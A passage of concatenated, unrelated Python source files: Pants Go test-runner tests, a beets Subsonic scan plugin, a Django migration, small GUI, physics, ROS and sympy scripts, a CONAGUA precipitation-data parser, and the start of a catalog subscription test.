assert transform_test_args(["-v"], timeout_field_value=100) == ("-test.v", "-test.timeout=100s")
assert transform_test_args(["-timeout=1m", "-v"], timeout_field_value=100) == (
"-test.timeout=1m",
"-test.v",
)
assert transform_test_args(["-timeout", "1m", "-v"], timeout_field_value=100) == (
"-test.timeout",
"1m",
"-test.v",
)
def test_all_the_tests_are_successful(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
func add(x, y int) int {
return x + y
}
func Add(x, y int) int {
return add(x, y)
}
"""
),
"foo/fib.go": textwrap.dedent(
"""
package foo
func Fib(n int) int {
if n < 2 {
return n
}
return Fib(n-1) + Fib(n-2)
}
"""
),
"foo/internal_test.go": textwrap.dedent(
"""
package foo
import (
"fmt"
"testing"
)
func TestAddInternal(t *testing.T) {
if add(2, 3) != 5 {
t.Fail()
}
}
func BenchmarkAddInternal(b *testing.B) {
for n := 0; n < b.N; n++ {
Fib(10)
}
}
func ExamplePrintInternal() {
fmt.Println("foo")
// Output: foo
}
"""
),
"foo/external_test.go": textwrap.dedent(
"""
package foo_test
import (
"foo"
"fmt"
"testing"
)
func TestAddExternal(t *testing.T) {
if foo.Add(2, 3) != 5 {
t.Fail()
}
}
func BenchmarkAddExternal(b *testing.B) {
for n := 0; n < b.N; n++ {
foo.Fib(10)
}
}
func ExamplePrintExternal() {
fmt.Println("foo")
// Output: foo
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 0
print(f"stdout:\n{result.stdout}\nstderr:\n{result.stderr}")
assert "PASS: TestAddInternal" in result.stdout
assert "PASS: ExamplePrintInternal" in result.stdout
assert "BenchmarkAddInternal" in result.stdout
assert "PASS: TestAddExternal" in result.stdout
assert "PASS: ExamplePrintExternal" in result.stdout
assert "BenchmarkAddExternal" in result.stdout
def test_internal_test_fails(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/bar_test.go": textwrap.dedent(
"""
package foo
import "testing"
func TestAdd(t *testing.T) {
t.Fail()
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 1
assert "FAIL: TestAdd" in result.stdout
def test_internal_test_with_test_main(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add_test.go": textwrap.dedent(
"""
package foo
import (
"fmt"
"testing"
)
func TestAdd(t *testing.T) {
t.Fail()
}
func TestMain(m *testing.M) {
fmt.Println("foo.TestMain called")
m.Run()
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 1
assert "foo.TestMain called" in result.stdout
assert "FAIL: TestAdd" in result.stdout
def test_internal_test_fails_to_compile(rule_runner: RuleRunner) -> None:
"""A compilation failure should not cause Pants to error, only the test to fail."""
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
# Test itself is bad.
"foo/bad_test.go": "invalid!!!",
# A dependency of the test is bad.
"foo/dep/f.go": "invalid!!!",
"foo/dep/BUILD": "go_package()",
"foo/uses_dep/BUILD": "go_package()",
"foo/uses_dep/f_test.go": textwrap.dedent(
"""
package uses_dep
import (
"foo/dep"
"testing"
)
func TestAdd(t *testing.T) {
if add(2, 3) != 5 {
t.Fail()
}
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 1
assert "bad_test.go:1:1: expected 'package', found invalid\n" in result.stderr
tgt = rule_runner.get_target(Address("foo/uses_dep"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 1
assert "dep/f.go:1:1: expected 'package', found invalid\n" in result.stderr
def test_external_test_fails(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
func Add(x, y int) int {
return x + y
}
"""
),
"foo/add_test.go": textwrap.dedent(
"""
package foo_test
import (
_ "foo"
"testing"
)
func TestAdd(t *testing.T) {
t.Fail()
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo", generated_name="./"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 1
assert "FAIL: TestAdd" in result.stdout
def test_external_test_with_test_main(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
func Add(x, y int) int {
return x + y
}
"""
),
"foo/add_test.go": textwrap.dedent(
"""
package foo_test
import (
"foo"
"fmt"
"testing"
)
func TestAdd(t *testing.T) {
if foo.Add(2, 3) != 5 {
t.Fail()
}
}
func TestMain(m *testing.M) {
fmt.Println("foo_test.TestMain called")
m.Run()
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo", generated_name="./"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 0
assert "foo_test.TestMain called" in result.stdout
def test_both_internal_and_external_tests_fail(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
func Add(x, y int) int {
return x + y
}
"""
),
"foo/add_int_test.go": textwrap.dedent(
"""
package foo
import (
"testing"
)
func TestAddInternal(t *testing.T) {
t.Fail()
}
"""
),
"foo/add_ext_test.go": textwrap.dedent(
"""
package foo_test
import (
_ "foo"
"testing"
)
func TestAddExternal(t *testing.T) {
t.Fail()
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 1
assert "FAIL: TestAddInternal" in result.stdout
assert "FAIL: TestAddExternal" in result.stdout
@pytest.mark.no_error_if_skipped
def test_fuzz_target_supported(rule_runner: RuleRunner) -> None:
go_version_result = rule_runner.request(
ProcessResult, [GoSdkProcess(["version"], description="Get `go` version.")]
)
if "go1.18" not in go_version_result.stdout.decode():
pytest.skip("Skipping because Go SDK is not 1.18 or higher.")
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/fuzz_test.go": textwrap.dedent(
"""
package foo
import (
"testing"
)
func FuzzFoo(f *testing.F) {
f.Add("foo")
f.Fuzz(func(t *testing.T, v string) {
if v != "foo" {
t.Fail()
}
})
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 0
assert "PASS: FuzzFoo" in result.stdout
def test_extra_env_vars(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": textwrap.dedent(
"""
go_mod(name='mod')
go_package(
test_extra_env_vars=(
"GO_PACKAGE_VAR_WITHOUT_VALUE",
"GO_PACKAGE_VAR_WITH_VALUE=go_package_var_with_value",
"GO_PACKAGE_OVERRIDE_WITH_VALUE_VAR=go_package_override_with_value_var_override",
)
)
"""
),
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
import "os"
func envIs(e, v string) bool {
return (os.Getenv(e) == v)
}
"""
),
"foo/add_test.go": textwrap.dedent(
"""
package foo
import "testing"
func TestEnvs(t *testing.T) {
if !envIs("ARG_WITH_VALUE_VAR", "arg_with_value_var") {
t.Fail()
}
if !envIs("ARG_WITHOUT_VALUE_VAR", "arg_without_value_var") {
t.Fail()
}
if !envIs("GO_PACKAGE_VAR_WITH_VALUE", "go_package_var_with_value") {
t.Fail()
}
if !envIs("GO_PACKAGE_VAR_WITHOUT_VALUE", "go_package_var_without_value") {
t.Fail()
}
if !envIs("GO_PACKAGE_OVERRIDE_WITH_VALUE_VAR", "go_package_override_with_value_var_override") {
t.Fail()
}
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
rule_runner.set_options(
args=[
"--go-test-args=-v -bench=.",
'--test-extra-env-vars=["ARG_WITH_VALUE_VAR=arg_with_value_var", "ARG_WITHOUT_VALUE_VAR", "GO_PACKAGE_OVERRIDE_ARG_WITH_VALUE_VAR"]',
],
env={
"ARG_WITHOUT_VALUE_VAR": "arg_without_value_var",
"GO_PACKAGE_VAR_WITHOUT_VALUE": "go_package_var_without_value",
"GO_PACKAGE_OVERRIDE_WITH_VALUE_VAR": "go_package_override_with_value_var",
},
env_inherit={"PATH"},
)
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 0
assert "PASS: TestEnvs" in result.stdout
def test_skip_tests(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"f_test.go": "",
"BUILD": textwrap.dedent(
"""\
go_package(name='run')
go_package(name='skip', skip_tests=True)
"""
),
}
)
def is_applicable(tgt_name: str) -> bool:
tgt = rule_runner.get_target(Address("", target_name=tgt_name))
return GoTestFieldSet.is_applicable(tgt)
assert is_applicable("run")
assert not is_applicable("skip")
def test_no_tests(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
func add(x, y int) int {
return x + y
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code is None
def test_compilation_error(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
func add(x, y int) int {
return x + y
}
"""
),
"foo/add_test.go": textwrap.dedent(
"""
package foo
import "testing"
!!!
func TestAdd(t *testing.T) {
if add(2, 3) != 5 {
t.Fail()
}
}
"""
),
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 1
assert "failed to parse" in result.stderr
def test_file_dependencies(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"f.txt": "",
"BUILD": "file(name='root', source='f.txt')",
"foo/BUILD": textwrap.dedent(
"""
go_mod(name='mod')
go_package(dependencies=[":testdata", "//:root"])
file(name="testdata", source="testdata/f.txt")
"""
),
"foo/go.mod": "module foo",
"foo/foo_test.go": textwrap.dedent(
"""
package foo
import (
"os"
"testing"
)
func TestFilesAvailable(t *testing.T) {
_, err1 := os.Stat("testdata/f.txt")
if err1 != nil {
t.Fatalf("Could not stat foo/testdata/f.txt: %v", err1)
}
_, err2 := os.Stat("../f.txt")
if err2 != nil {
t.Fatalf("Could not stat f.txt: %v", err2)
}
}
"""
),
"foo/testdata/f.txt": "",
}
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 0
def test_profile_options_write_results(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod(name='mod')\ngo_package()",
"foo/go.mod": "module foo",
"foo/add.go": textwrap.dedent(
"""
package foo
func add(x, y int) int {
return x + y
}
"""
),
"foo/add_test.go": textwrap.dedent(
"""
package foo
import "testing"
func TestAdd(t *testing.T) {
if add(2, 3) != 5 {
t.Fail()
}
}
"""
),
}
)
rule_runner.set_options(
[
"--go-test-args=-v -bench=.",
"--go-test-block-profile",
"--go-test-cpu-profile",
"--go-test-mem-profile",
"--go-test-mutex-profile",
"--go-test-trace",
],
env_inherit={"PATH"},
)
tgt = rule_runner.get_target(Address("foo"))
result = rule_runner.request(
TestResult, [GoTestRequest.Batch("", (GoTestFieldSet.create(tgt),), None)]
)
assert result.exit_code == 0
assert "PASS: TestAdd" in result.stdout
extra_output = result.extra_output
assert extra_output is not None
assert sorted(extra_output.files) == [
"block.out",
"cpu.out",
"mem.out",
"mutex.out",
"test_runner",
"trace.out",
]
|
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Updates Subsonic library on Beets import
Your Beets configuration file should contain
a "subsonic" section like the following:
subsonic:
url: https://mydomain.com:443/subsonic
user: username
pass: password
auth: token
For older Subsonic versions, token authentication
is not supported, use password instead:
subsonic:
url: https://mydomain.com:443/subsonic
user: username
pass: password
auth: pass
"""
import hashlib
import random
import string
import requests
from binascii import hexlify
from beets import config
from beets.plugins import BeetsPlugin
__author__ = 'https://github.com/maffo999'
class SubsonicUpdate(BeetsPlugin):
def __init__(self):
super().__init__()
# Set default configuration values
config['subsonic'].add({
'user': 'admin',
'pass': 'admin',
'url': 'http://localhost:4040',
'auth': 'token',
})
config['subsonic']['pass'].redact = True
self.register_listener('database_change', self.db_change)
self.register_listener('smartplaylist_update', self.spl_update)
def db_change(self, lib, model):
self.register_listener('cli_exit', self.start_scan)
def spl_update(self):
self.register_listener('cli_exit', self.start_scan)
@staticmethod
def __create_token():
"""Create salt and token from given password.
:return: The generated salt and hashed token
"""
password = config['subsonic']['pass'].as_str()
# Pick the random sequence and salt the password
r = string.ascii_letters + string.digits
salt = "".join([random.choice(r) for _ in range(6)])
salted_password = password + salt
token = hashlib.md5(salted_password.encode('utf-8')).hexdigest()
# Put together the payload of the request to the server and the URL
return salt, token
@staticmethod
def __format_url(endpoint):
"""Get the Subsonic URL to trigger the given endpoint.
Uses either the url config option or the deprecated host, port,
and context_path config options together.
:return: Endpoint for updating Subsonic
"""
url = config['subsonic']['url'].as_str()
if url and url.endswith('/'):
url = url[:-1]
# @deprecated("Use url config option instead")
if not url:
host = config['subsonic']['host'].as_str()
port = config['subsonic']['port'].get(int)
context_path = config['subsonic']['contextpath'].as_str()
if context_path == '/':
context_path = ''
url = f"http://{host}:{port}{context_path}"
return url + f'/rest/{endpoint}'
def start_scan(self):
user = config['subsonic']['user'].as_str()
auth = config['subsonic']['auth'].as_str()
url = self.__format_url("startScan")
self._log.debug('URL is {0}', url)
self._log.debug('auth type is {0}', config['subsonic']['auth'])
if auth == "token":
salt, token = self.__create_token()
payload = {
'u': user,
't': token,
's': salt,
'v': '1.13.0', # Subsonic 5.3 and newer
'c': 'beets',
'f': 'json'
}
elif auth == "password":
password = config['subsonic']['pass'].as_str()
encpass = hexlify(password.encode()).decode()
payload = {
'u': user,
'p': f'enc:{encpass}',
'v': '1.12.0',
'c': 'beets',
'f': 'json'
}
else:
return
try:
response = requests.get(url, params=payload)
json = response.json()
if response.status_code == 200 and \
json['subsonic-response']['status'] == "ok":
count = json['subsonic-response']['scanStatus']['count']
self._log.info(
f'Updating Subsonic; scanning {count} tracks')
elif response.status_code == 200 and \
json['subsonic-response']['status'] == "failed":
error_message = json['subsonic-response']['error']['message']
self._log.error(f'Error: {error_message}')
else:
self._log.error('Error: {0}', json)
except Exception as error:
self._log.error(f'Error: {error}')
|
# Generated by Django 2.1.3 on 2018-11-21 06:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0010_auto_20181121_1209'),
]
operations = [
migrations.AddField(
model_name='teacher',
name='educations',
field=models.TextField(default='Check'),
preserve_default=False,
),
migrations.AlterField(
model_name='teacher',
name='experiences',
field=models.TextField(default='Add Educations Details'),
),
]
|
import PySimpleGUI as sg, sys
import pandas as pd
df = pd.read_csv(r"C:\Users\avivy\PycharmProjects\pythonProject\pysimplegui\test_for_main.csv", header=None)
first_col = df.iloc[:, 0].values
a = "\n".join(first_col)
print (a)
form = sg.FlexForm("Dynamic Combo")
col = [[sg.Checkbox(f'{i}', enable_events=True, font='consolas 10')
for i in a]]
layout = [[sg.Text('<-- Scroll with Checkbox -->')],
[sg.Column(col, size=(150, 150), scrollable=True)],
[sg.Cancel('Exit')]
]
form = sg.Window('Checkbox practice').Layout(layout)
while True:
event, values = form.Read()
if event == "SELECT ALL":
# IN THE RANGE ALWAYS PUT A NUMBER MORE TO GET THAT NUMBER
for x in range(1, 19):
form.FindElement(x).Update(True)
if event == "DESELECT ALL":
# IN THE RANGE ALWAYS PUT A NUMBER MORE TO GET THAT NUMBER
for x in range(1, 19):
form.FindElement(x).Update(False)
if event == "Exit":
sys.exit()
|
from unittest import TestCase
import phi
from phi import math
from phi.field import CenteredGrid
from phi.geom import Box
from phiml.math import channel, tensor
from phiml.backend import Backend
def simulate_hit(pos, height, vel, angle, gravity=1.):
vel_x, vel_y = math.cos(angle) * vel, math.sin(angle) * vel
height = math.maximum(height, .5)
hit_time = (vel_y + math.sqrt(vel_y**2 + 2 * gravity * height)) / gravity
return pos + vel_x * hit_time, hit_time, height, vel_x, vel_y
def sample_trajectory(pos, height, vel, angle, gravity=1.):
hit, hit_time, height, vel_x, vel_y = simulate_hit(pos, height, vel, angle, gravity)
def y(x):
t = (x.vector[0] - pos) / vel_x
y_ = height + vel_y * t - gravity / 2 * t ** 2
return math.where((y_ > 0) & (t > 0), y_, math.NAN)
return CenteredGrid(y, x=2000, bounds=Box(x=(min(pos.min, hit.min), max(pos.max, hit.max))))
BACKENDS = phi.detect_backends()
class TestThrow(TestCase):
def test_simulate_hit(self):
math.assert_close(10 + math.sqrt(2), simulate_hit(10, 1, 1, 0)[0])
def test_sample_trajectory(self):
sample_trajectory(tensor(10), 1, 1, math.linspace(-math.PI / 4, 1.5, channel(linspace=7)))
def test_gradient_descent(self):
def loss_function(vel):
return math.l2_loss(simulate_hit(10, 1, vel, 0)[0] - 0)
gradient = math.functional_gradient(loss_function)
for backend in BACKENDS:
if backend.supports(Backend.jacobian):
with backend:
vel = 1
for i in range(10):
loss, (grad,) = gradient(vel)
vel = vel - .2 * grad
print(f"vel={vel} - loss={loss}")
math.assert_close(-7.022265, vel)
|
#load_image.py
#Shorthand to load image from assets directory
import os, sys, pygame
def load_image(name):
fullname = os.path.join('assets', name)
try:
image = pygame.image.load(fullname)
except pygame.error, message:
print 'Cannot load image:', name
raise SystemExit, message
image = image.convert()
return image
|
import sympy
def error(f, err_vars=None):
from sympy import Symbol, latex
s = 0
latex_names = dict()
if err_vars == None:
err_vars = f.free_symbols
for v in err_vars:
err = Symbol('latex_std_' + v.name)
s += f.diff(v)**2 * err**2
latex_names[err] = '\\sigma_{' + latex(v) + '}'
return latex(sympy.sqrt(s), symbol_names=latex_names)
N1, N0 = sympy.var('N_1 N_0')
N = N1 - N0
print('\n\nT = ', N)
print(r'\sigma_T = ', error(N))
|
#!/usr/bin/env python
import rospy
from std_msgs.msg import Int8
if __name__ == "__main__":
rospy.init_node("led7seg_talker")
pub = rospy.Publisher("led7seg", Int8, queue_size=10)
i = 0
rate = rospy.Rate(1)
while not rospy.is_shutdown():
rospy.loginfo("echo "+str(i))
pub.publish(i)
i += 1
if i > 9:
i = 0
rate.sleep()
|
# created by Ryan Spies
# 3/3/2015
# Python 2.7
# Description: parse through a individual CONAGUA csv files to cardfile
# Features: dms to dd conversion
# Plot features: datelocator for axis, subplots, tick label modifications
import os
import sys
import datetime as dt
from datetime import datetime
from dateutil import parser
from dateutil.relativedelta import relativedelta
import numpy as np
import pandas as pd
import collections
import matplotlib.pyplot as plt
plt.ioff()
import matplotlib.dates
os.chdir('../..')
maindir = os.getcwd()
workingdir = maindir + os.sep + 'Calibration_NWS'+ os.sep +'WGRFC_FY2015'+ os.sep +'raw_data'
startTime = datetime.now()
################### user input #########################
variable = 'ptpx' # choices: 'ptpx' or 'temp'
timestep = 'hourly' # choices: 'hourly'
station_plot = 'off' # creates a summary bar plot for each station -> choices: 'on' or 'off'
state = 'MX'
data_files = workingdir + os.sep + 'CONAGUA' +os.sep + 'ptpx' + os.sep + timestep + os.sep
out_dir = workingdir + os.sep + 'CONAGUA' +os.sep + 'ptpx' + os.sep + 'cardfiles'
summary_file = open(workingdir + os.sep + 'CONAGUA_summary_' + variable + '_' + timestep + '.csv','w')
bad_ptpx_file = workingdir + os.sep + 'CONAGUA' + os.sep + 'questionable_ptpx_check_' + timestep + '.txt'
elev_file = workingdir + os.sep + 'CONAGUA' +os.sep + 'station_elev_extract.csv'
########################################################
### read through the metadata file for station info ###
summary_file.write('NAME,SITE_ID,LAT,LON,ELEV,MISSING_DATA,VALID_DATA,YEARS_VALID,PCT_AVAIL,YEAR_START,YEAR_END\n')
### define temp and precip variable info ###
if variable == 'ptpx':
data_type = {'.ptp':'PTPX'}; dim = 'L'; unit = 'IN'; exts = ['.ptp']
thresh = 127.0 # max precip set to 5in/hr
set_miss_dates = [] # set specific dates to missing (if known to be bad precip)
bad_ptpx_summary = open(bad_ptpx_file,'wb')
station_summary = {}
station_summary = {}; elev_summary = {}
elev_site = open(elev_file,'r') # file generated with ArcGIS "extract multi values to points" tool
for row in elev_site:
spl = row.split(',')
if spl[0] != 'FID':
elev_ft = float(spl[15].rstrip())*3.28084 # GTOP0_1K elevation converted from meters to feet
elev_summary[spl[2]]=("%.0f" % elev_ft)
sys.path.append(os.getcwd() + os.sep + 'Python' + os.sep + 'modules')
import conversions
### loop through data files with 1983-2004 data
for data_file in os.listdir(data_files):
print 'Parsing raw data files...'
read_data = open(data_files + os.sep + data_file,'r')
count_all = 0; count_missing = 0
site_data = {}
site_data_daily = {}
for each in read_data:
count_all += 1
line = each.split(',')
if count_all == 1: # header 1st line
sep1 = line[0].split('(')
name = line[1].rstrip() # station name in header
site_id = line[1].replace('.',"")[:5].upper() # station id (first 5 char)
print site_id
# parse DMS in header line
if count_all == 2:
sep2 = line[1].replace('\xc2\xb0',',')
sep2 = line[1].replace('\xb0',',')
sep2 = sep2.replace("'",',')
sep2 = sep2.replace(")",'')
sep2 = sep2.split(',')
sep2 = filter(None,sep2)
sep3 = line[3].replace('\xc2\xb0',',')
sep3 = line[3].replace('\xb0',',')
sep3 = sep3.replace("'",',')
sep3 = sep3.replace(")",'')
sep3 = sep3.split(',')
sep3 = filter(None,sep3)
# use conversion module for dms to dd
lon = str("%.3f" % (conversions.dms_to_dd(sep2[0],sep2[1],sep2[2],'W')))
lat = str("%.3f" % (conversions.dms_to_dd(sep3[0],sep3[1],sep3[2],'N')))
station_summary[site_id] = [name,lat,lon,elev_summary[site_id]]
if count_all >= 5:
data = line[6]
date_time = parser.parse(line[1])
if str(data) != '' and str(data) != '\n': # ignore missing data -> filled in below (-999)
if variable == 'ptpx':
if float(data) < thresh and float(data) >= 0.0: # QA/QC bad precip values
if date_time.date() not in set_miss_dates:
site_data[date_time]=[float(data)/25.4]
else:
if float(data) == 0.00:
site_data[date_time]=[float(data)]
if float(data) >= thresh:
bad_ptpx_summary.write(str(site_id) + ' ' + str(date_time) + ' ' + str(data) + '\n')
read_data.close()
print 'Writing data to cardfile...'
# NOTE: UNIX requires a binary file to properly read end line formats - 'wb'
for ext in exts:
print 'Creating -> ' + ext + ' file'
min_date = min(site_data); max_date = max(site_data); iter_date = min_date
# need to be sure that the first data point starts on day 1 hour 1
if iter_date.day != 1 or iter_date.hour != 1:
iter_date = iter_date + relativedelta(months=+1)
iter_date = dt.datetime(iter_date.year,iter_date.month,1,0,0)
min_date = iter_date
month_count = 0; previous_month = 13 # use these for calculating line number for month/year lines
if timestep == 'hourly':
site_label = state + '-' + site_id + '-HLY'
step_time = 1
year_factor = float(24*365)
else:
site_label = state + '-' + site_id + '-DLY'
step_time = 24
year_factor = float(365)
#cardfile = open(out_dir + site_label + '_RAWS.' + str(min_date.month) + str(min_date.year) + '.' + str(max_date.month) + str(max_date.year) + ext,'wb')
cardfile = open(out_dir + os.sep +site_label + '_CONA' + ext,'wb')
###### header info ######
cardfile.write('$ Data provided by CONAGUA\n')
cardfile.write('$ Data processed from hourly text files using python script\n')
cardfile.write('$ Ryan Spies rspies@lynkertech.com\n')
cardfile.write('$ Data Generated: ' + str(datetime.now())[:10] + '\n')
cardfile.write('$\n')
cardfile.write('{:12s} {:4s} {:4s} {:4s} {:2d} {:12s} {:12s}'.format('datacard', data_type[ext], dim,unit,int(step_time),site_label,station_summary[site_id][0].upper()))
cardfile.write('\n')
cardfile.write('{:2d} {:4d} {:2d} {:4d} {:2d} {:8s}'.format(int(min_date.month), int(min_date.year), int(max_date.month),int(max_date.year),1,'F9.2'))
cardfile.write('\n')
###### write formatted data #####
valid_count = 0; miss_count = 0; plot_dict = {}
plot_dict = collections.OrderedDict(plot_dict) # ordered dictionary
while iter_date <= max_date:
if int(iter_date.month) == previous_month:
month_count += 1
else:
month_count = 1
if iter_date in site_data:
valid_count += 1
out_data = np.mean(site_data[iter_date])
else:
out_data = -999
miss_count += 1
if out_data != -999 :
plot_dict[iter_date] = float(out_data) # apped data to plot dictionary
cardfile.write('{:12s}{:2d}{:02d}{:4d}{:9.2f}'.format(site_label,int(iter_date.month),int(str(iter_date.year)[-2:]),month_count,float(out_data)))
cardfile.write('\n')
previous_month = int(iter_date.month)
iter_date = iter_date + dt.timedelta(hours=step_time)
cardfile.close()
if ext == '.ptp' and station_plot == 'on':
### save hourly precip data to pandas dataframe, reample, and plot
print 'Creating plot of daily and monthly station data... '
df = pd.DataFrame(plot_dict.items(), columns=['Date_Time', 'ptp'])
#df.reset_index(level=[0, 1], inplace=True)
resample_df_daily = df.set_index('Date_Time')['ptp'].resample('D', how='sum')# resample to daily
resample_df_monthly = df.set_index('Date_Time')['ptp'].resample('M', how='sum')# resample to monthly
plot_dates_daily = resample_df_daily.index.to_pydatetime(); plot_data_daily = resample_df_daily.values.tolist()
plot_dates_monthly = resample_df_monthly.index.to_pydatetime(); plot_data_monthly = resample_df_monthly.values.tolist()
fig = plt.subplots(figsize=(16,10))
ax1 = plt.subplot(211)
ax1.bar(plot_dates_daily, plot_data_daily, color ='k') # plot data
ax1.set_ylabel('Daily Precip (in)')#; ax1.set_xlabel('Date')
ax1.xaxis.set_major_locator(matplotlib.dates.YearLocator())
plt.xticks(rotation='vertical')
ax1.grid(True)
plt.title(station_summary[site_id][0] + ', MX - CONAGUA (' + site_id + ')', fontsize=16)
ax2 = plt.subplot(212, sharex=ax1)
ax2.bar(plot_dates_monthly, plot_data_monthly, color ='k') # plot data
ax2.set_ylabel('Monthly Precip (in)'); ax2.set_xlabel('Date')
plt.xticks(rotation='vertical')
ax2.xaxis.set_major_locator(matplotlib.dates.YearLocator())
mean_annual_ppt = 'Mean Annual Precip: ' + "%.2f" % (np.nanmean(plot_data_monthly)*12) + ' in'
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
ax2.text(0.75, 0.95, mean_annual_ppt, fontsize=13, transform=ax2.transAxes,
verticalalignment='top', bbox=props)
#ax.xaxis.set_minor_locator(matplotlib.dates.MonthLocator())
#ax.xaxis.set_minor_formatter(matplotlib.dates.DateFormatter('%m'))
#ax.tick_params(axis='x',labelsize=8, which = 'minor')
ax2.grid(True)
plt.savefig(workingdir + os.sep + 'CONAGUA' + os.sep + 'station_data_plots_' + timestep + os.sep + site_label, bbox_inches='tight')
plt.close()
### write to summary csv files and taplot files ###
print 'Writing summary and taplot files...'
if ext == '.tpt' or ext == '.ptp':
summary_file.write(station_summary[site_id][0]+','+str(site_id)+','+station_summary[site_id][1]+','+station_summary[site_id][2]+','+station_summary[site_id][3]+
','+str(miss_count)+','+str(valid_count)+','+str(round((valid_count/year_factor),2))+','+str((float(valid_count)/(miss_count+valid_count))*100)+','+str(min_date.year) +',' + str(max_date.year) + '\n')
if variable == 'ptpx':
bad_ptpx_summary.close()
summary_file.close()
print 'Completed!'
print 'Running time: ' + str(datetime.now() - startTime)
|
# Copyright (C) 2019 Verizon. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
import mock
from rest_framework.test import APIClient
from django.test import TestCase
from catalog.pub.database.models import VnfPkgSubscriptionModel
from .const import vnf_subscription_data
class TestNfPackageSubscription(TestCase):
def setUp(self):
self.client = APIClient()
VnfPkgSubscriptionModel.objects.filter().delete()
self.vnf_subscription_data = vnf_subscription_data
def tearDown(self):
pass
@mock.patch("requests.get")
@mock.patch.object(uuid, 'uuid4')
def test_create_vnf_subscription(self, mock_uuid4, mock_requests):
temp_uuid = "99442b18-a5c7-11e8-998c-bf1755941f13"
mock_requests.return_value.status_code = 204
mock_requests.get.status_code = 204
mock_uuid4.return_value = temp_uuid
response = self.client.post(
